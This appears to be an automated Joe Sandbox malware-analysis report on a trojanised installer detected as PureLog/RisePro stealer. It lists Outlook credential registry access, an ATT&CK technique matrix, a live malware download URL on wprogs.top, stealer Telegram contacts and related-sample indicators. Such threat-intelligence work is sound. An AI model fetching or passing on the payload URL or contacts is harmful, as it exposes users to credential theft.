Source: C:\Users\user\AppData\Local\Temp\insta313tg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\insta313tg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003

Source: C:\Windows\SysWOW64\cmd.exe	Directory queried: number of queries: 1617
Source: C:\Users\user\Desktop\InjectToolInstaller.exe	Directory queried: number of queries: 1043

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 42.2.insta313tg.exe.5120000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.insta313tg.exe.5120000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.471803561.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	212 Scripting	Valid Accounts	2 Windows Management Instrumentation	212 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	14 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 Install Root Certificate	NTDS	77 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	361 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	211 Process Injection	Network Sniffing	11 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	11 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\21.mp3	100%	Avira	HEUR/AGEN.1332199

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
wprogs.top	20%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
https://blueoakcouncil.org/license/1.0.0	0%	Avira URL Cloud	safe
https://ruyadorno.com	0%	Avira URL Cloud	safe
https://wprogs.top/wefrgdf/bndwaf.exe	100%	Avira URL Cloud	malware
http://npm.im/	0%	Avira URL Cloud	safe
https://wprogs.top:80/wefrgdf/bndwaf.exe	100%	Avira URL Cloud	malware
https://wprogs.top/wefrgdf/bndwaf.exe#	100%	Avira URL Cloud	malware
https://ruyadorno.com	0%	Virustotal		Browse
http://npm.im/init-package-json)	0%	Avira URL Cloud	safe
https://blueoakcouncil.org/license/1.0.0	0%	Virustotal		Browse
https://mths.be/emoji	0%	Avira URL Cloud	safe
https://npm.im/libnpmaccess)	0%	Avira URL Cloud	safe
https://mths.be/emoji	1%	Virustotal		Browse
http://npm.im/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wprogs.top	5.161.74.235	true	false	20%, Virustotal, Browse	unknown
ipinfo.io	34.117.186.192	true	false		high
db-ip.com	104.26.4.15	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://db-ip.com/demo/home.php?s=102.165.48.43	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/nodejs/gyp-next/archive/	update-gyp.py.0.dr	false		high
https://github.com/DABH/colors.js	package.json137.0.dr	false		high
http://npm.im/	npm-audit.md.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	Chrome_Default.txt0.48.dr	false		high
https://github.com/matheussampaio	utils.js.0.dr	false		high
https://github.com/mathiasbynens/emoji-regex.git	package.json139.0.dr	false		high
https://github.com/githubname/githubrepo	npm-install.md.0.dr	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://db-ip.com/demo/home.php?s=102.165.48.43=OW	insta313tg.exe, 00000030.00000002.604627485.0000000000B34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nodejs.org/api/fs.html#fs_stat_time_values)	polyfill.js.0.dr	false		high
https://wprogs.top:80/wefrgdf/bndwaf.exe	insta313tg.exe, 00000030.00000002.604627485.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/npm/agent/issues	package.json148.0.dr	false		high
https://gitlab.com/gitlabname/gitlabrepo	npm-install.md.0.dr	false		high
http://dev.w3.org/csswg/css-color/#hwb-to-rgb	conversions.js.0.dr	false		high
https://www.patreon.com/feross	package.json33.0.dr	false		high
https://github.com/DABH/colors.js/issues	package.json137.0.dr	false		high
https://github.com/isaacs/jackspeak.git	package.json20.0.dr	false		high
https://stackoverflow.com/questions/16657803/creating-autocomplete-script-with-sub-commands	completion.fish.0.dr	false		high
https://github.com/nodejs/admin/blob/master/CODE_OF_CONDUCT.md)	CONTRIBUTING.md.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	insta313tg.exe, 0000002A.00000002.470471234.0000000002682000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/npm/fs-minipass/issues	package.json44.0.dr	false		high
https://github.com/watson/is-lambda/issues	package.json15.0.dr	false		high
https://github.com/Marak/colors.js/blob/master/lib/styles.js	utils.js.0.dr	false		high
https://stackoverflow.com/q/14436606/23354	insta313tg.exe, 0000002A.00000002.471586467.0000000004860000.00000004.08000000.00040000.00000000.sdmp, insta313tg.exe, 0000002A.00000002.470471234.000000000254E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/npm/agent#readme	package.json148.0.dr	false		high
https://github.com/npm/agent.git	package.json148.0.dr	false		high
https://github.com/npm/fs.git	package.json150.0.dr	false		high
https://t.me/RiseProSUPPORT	SmzK98tFGb6qzdocFm21bMi.zip.48.dr	false		high
https://jsperf.com/object-keys-vs-for-in-with-closure/3	route.js.0.dr	false		high
https://github.com/npm/write-file-atomic	package.json134.0.dr	false		high
https://ruyadorno.com	package.json149.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/	insta313tg.exe, insta313tg.exe, 00000030.00000002.604627485.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, insta313tg.exe, 00000030.00000002.604627485.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, insta313tg.exe, 00000030.00000002.604627485.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/npm/inflight.git	package.json2.0.dr	false		high
https://github.com/nodejs/node/issues/42785	index.js3.0.dr	false		high
https://github.com/npm/validate-npm-package-name.git	package.json62.0.dr	false		high
https://github.com/npm/mute-stream.git	package.json126.0.dr	false		high
https://github.com/watson/is-lambda.git	package.json15.0.dr	false		high
https://github.com/indexzero/forever/tarball/v0.5.6	npm-install.md.0.dr	false		high
http://github.com/garycourt/murmurhash-js	imurmurhash.min.js.0.dr	false		high
http://crl.entrust.net/2048ca.crl0	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/npm/npm-package-arg/issues	package.json61.0.dr	false		high
https://github.com/fish-shell/fish-shell/blob/HEAD/share/completions/npm.fish	completion.fish.0.dr	false		high
https://github.com/npm/validate-npm-package-name	package.json62.0.dr	false		high
https://www.npmjs.com/forgot	error-message.js.0.dr	false		high
https://github.com/wildlyinaccurate/relative-date.git	package.json49.0.dr	false		high
https://ipinfo.io/m3m1	insta313tg.exe, 00000030.00000002.604627485.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blueoakcouncil.org/license/1.0.0	LICENSE.md11.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/facebook/react-native/pull/1632	browser.js2.0.dr	false		high
https://github.com/DABH	package.json137.0.dr	false		high
https://github.com/isaacs/common-ancestor-path	package.json105.0.dr	false		high
https://docs.npmjs.com/policies/terms.	npm.md.0.dr	false		high
https://registry.npmjs.org	npm.md.0.dr	false		high
https://github.com/npm/cli/blob/latest/CONTRIBUTING.md)	npm.md.0.dr	false		high
http://stackoverflow.com/a/398120/376773	browser.js2.0.dr	false		high
https://wprogs.top/wefrgdf/bndwaf.exe	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, insta313tg.exe, 00000030.00000002.604627485.0000000000B34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/npm/cli#readme	package.json135.0.dr, package.json136.0.dr	false		high
https://github.com/sindresorhus/has-flag/blob/main/index.js	index.js28.0.dr	false		high
https://github.com/isaacs/isexe.git	package.json14.0.dr	false		high
http://jsonpatch.com	index.mjs0.0.dr, index.cjs0.0.dr, index.mjs.0.dr	false		high
http://github.com/kpdecker/jsdiff/issues).	CONTRIBUTING.md0.0.dr	false		high
https://stackoverflow.com/q/11564914/23354;	insta313tg.exe, 0000002A.00000002.471586467.0000000004860000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/sponsors/isaacs	package.json20.0.dr, package.json25.0.dr	false		high
https://github.com/isaacs/node-mkdirp.git	package.json116.0.dr	false		high
http://stackoverflow.com/a/16459606/376773	browser.js2.0.dr	false		high
http://github.com/kpdecker/jsdiff/issues	CONTRIBUTING.md0.0.dr	false		high
https://github.com/isaacs/color-support.git	package.json97.0.dr	false		high
https://github.com/npm/write-file-atomic/issues	package.json134.0.dr	false		high
https://gist.github.com/gistID	npm-install.md.0.dr	false		high
https://t.me/risepro_bot3	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/sponsors/feross	package.json33.0.dr	false		high
https://github.com/npm/treeverse.git	package.json50.0.dr	false		high
https://mathiasbynens.be/	LICENSE-MIT.txt1.0.dr, LICENSE-MIT.txt0.0.dr, package.json139.0.dr	false		high
https://www.artima.com/weblogs/viewpost.jsp?thread=164293	diff.js0.0.dr	false		high
http://npm.im/init-package-json)	npm-init.md.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/nodejs/node-gyp)	npm.md.0.dr	false		high
https://wprogs.top/wefrgdf/bndwaf.exe#	insta313tg.exe, 00000030.00000002.604627485.0000000000B34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://jsperf.com/1-vs-infinity	route.js.0.dr	false		high
https://github.com/npm/fs-minipass#readme	package.json44.0.dr	false		high
https://github.com/mgravell/protobuf-net	insta313tg.exe, 0000002A.00000002.471586467.0000000004860000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/chalk/ansi-regex?sponsor=1	package.json115.0.dr, package.json138.0.dr	false		high
https://mths.be/emoji	index.js107.0.dr, text.js.0.dr, text.js0.0.dr, RGI_Emoji.js1.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sindresorhus.com	package.json70.0.dr, package.json128.0.dr, package.json130.0.dr, package.json115.0.dr, package.json138.0.dr, package.json140.0.dr	false		high
https://docs.npmjs.com/about-developers-team	npm-team.md.0.dr	false		high
https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26aqs%3Dchrome..69i57j46j0l3j46j0.427j0j7%26sou	insta313tg.exe, 00000030.00000002.604873398.0000000003241000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/isaacs/string-locale-compare	package.json143.0.dr	false		high
https://github.com/gvarsanyi/sync-exec/blob/master/js/sync-exec.js	process-exec-sync.js.0.dr	false		high
https://github.com/npm/rfcs/blob/latest/implemented/0019-remove-update-depth-option.md	update.js.0.dr	false		high
https://registry.npmjs.org/-/npm/v1/keys	npm-audit.md.0.dr	false		high
https://t.me/risepro_bot	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, insta313tg.exe, 00000030.00000002.604627485.0000000000B34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	insta313tg.exe, 00000030.00000002.604627485.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://blog.npmjs.org/post/98131109725/npm-2-0-0)	npm-start.md.0.dr	false		high
https://npm.im/libnpmaccess)	npm-access.md.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/npm/init-package-json.git	package.json6.0.dr	false		high
https://stackoverflow.com/q/2152978/23354	insta313tg.exe, 0000002A.00000002.471586467.0000000004860000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/npm/npm-package-arg.git	package.json61.0.dr	false		high
https://github.com/mathiasbynens/emoji-regex/issues	package.json139.0.dr	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	Chrome_Default.txt0.48.dr	false		high
https://www.google.com/search?q=net	Chrome_Default.txt0.48.dr	false		high
https://github.com/isaacs/inflight	package.json2.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
116.203.183.140	unknown	Germany	24940	HETZNER-ASDE	true
104.26.4.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
5.161.74.235	wprogs.top	Germany	24940	HETZNER-ASDE	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417459
Start date and time:	2024-03-29 11:03:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	InjectToolInstaller.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@145/1085@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 238 Number of non-executed functions: 196
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:04:06	API Interceptor	21x Sleep call for process: InjectToolInstaller.exe modified
11:04:09	API Interceptor	2x Sleep call for process: net1.exe modified
11:04:11	API Interceptor	24x Sleep call for process: powershell.exe modified
11:04:37	API Interceptor	39x Sleep call for process: cmd.exe modified
11:04:38	API Interceptor	37x Sleep call for process: wscript.exe modified
11:04:42	API Interceptor	545x Sleep call for process: insta313tg.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	uUsgzQ3DoW.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
	8BZBgbeCcz.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
104.26.4.15	#Ud3ec#Ud2b8#Ud3f4#Ub9ac#Uc624.exe	Get hash	malicious	Nemty, Xmrig	Browse	api.db-ip.com/v2/free/102.129.152.212/countryName
5.161.74.235	QjQx1KuqXI.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse
	bpeyJ7ZeqN.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse
	2CgZgTG2zg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
wprogs.top	RUN.exe	Get hash	malicious	Babadeda	Browse	5.161.74.235
	QjQx1KuqXI.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	5.161.74.235
	bpeyJ7ZeqN.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	5.161.74.235
	2CgZgTG2zg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	5.161.74.235
ipinfo.io	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	XqC4Zcp8qg.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	3MdZ1WiAYP.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	7GofFHQDvk.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	88Oj06xDol.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	uQeIMs91Vh.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	34.117.186.192
	jUlAlD6KHz.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	Iv88OQbqpE.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://cloudflare-ipfs.com/ipfs/QmWogjL6GutGKbdVU2x417hXn56fpyEV8KCHFJUBJrcBaA/#hello@domain.com	Get hash	malicious	HTMLPhisher	Browse	34.117.186.192
db-ip.com	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	XqC4Zcp8qg.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	3MdZ1WiAYP.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	7GofFHQDvk.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	88Oj06xDol.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	uQeIMs91Vh.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	104.26.5.15
	jUlAlD6KHz.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	Iv88OQbqpE.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	file.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	104.26.4.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	95.216.41.236
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	144.76.170.20
	getscreen-728974364.exe	Get hash	malicious	Unknown	Browse	5.75.168.191
	getscreen-728974364.exe	Get hash	malicious	Unknown	Browse	5.75.168.191
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	JAJL2EYBPH.exe	Get hash	malicious	DCRat	Browse	138.201.79.103
	https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389r	Get hash	malicious	HTMLPhisher	Browse	49.12.134.254
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	l2ZKczbGRq.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	34.117.186.192
	XqC4Zcp8qg.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	3MdZ1WiAYP.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	7GofFHQDvk.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	88Oj06xDol.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://attwebupdate.w3spaces.com/	Get hash	malicious	Unknown	Browse	34.117.239.71
	uQeIMs91Vh.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	34.117.186.192
	jUlAlD6KHz.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	Iv88OQbqpE.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
HETZNER-ASDE	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	95.216.41.236
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	144.76.170.20
	getscreen-728974364.exe	Get hash	malicious	Unknown	Browse	5.75.168.191
	getscreen-728974364.exe	Get hash	malicious	Unknown	Browse	5.75.168.191
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	JAJL2EYBPH.exe	Get hash	malicious	DCRat	Browse	138.201.79.103
	https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389r	Get hash	malicious	HTMLPhisher	Browse	49.12.134.254
CLOUDFLARENETUS	Stealer.exe	Get hash	malicious	Eternity Stealer	Browse	172.67.34.170
	MXpl6HFisn.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.com	Get hash	malicious	Phisher	Browse	172.64.150.248
	7ITPeT3VWW.exe	Get hash	malicious	LummaC	Browse	104.21.38.98
	l2ZKczbGRq.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	104.26.4.15
	XqC4Zcp8qg.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	3MdZ1WiAYP.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	7GofFHQDvk.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	TBC#01 Rev.A3 - lnexa.xls.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL_LHER000678175.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	892016_Past Invoice_03_26_2024_48118858_756483.wsf	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	Incident_Report_Harassment_by_Employee.doc	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	Reserva Detalhes.ppam	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	Chrome.vbs	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	aaaaaa.docx.doc	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	Detalhes Reserva.ppam	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	34.117.186.192 104.26.4.15
	pedido de compra 4500628950##.xla.xlsx	Get hash	malicious	AgentTesla	Browse	34.117.186.192 104.26.4.15
	CA-OP2402406.xla.xlsx	Get hash	malicious	AgentTesla	Browse	34.117.186.192 104.26.4.15

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\7zS48C4B291\node_modules\color-support\bin.js	JWQgbclQK5	Get hash	malicious	PureLog Stealer	Browse
C:\Users\user\AppData\Local\Temp\7zS48C4B291\node_modules\cross-spawn\node_modules\which\bin\node-which	JWQgbclQK5	Get hash	malicious	PureLog Stealer	Browse
	RUN.exe	Get hash	malicious	Babadeda	Browse
	https://github.com/httptoolkit/httptoolkit-desktop/releases/download/v1.14.8/HttpToolkit-installer-1.14.8.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
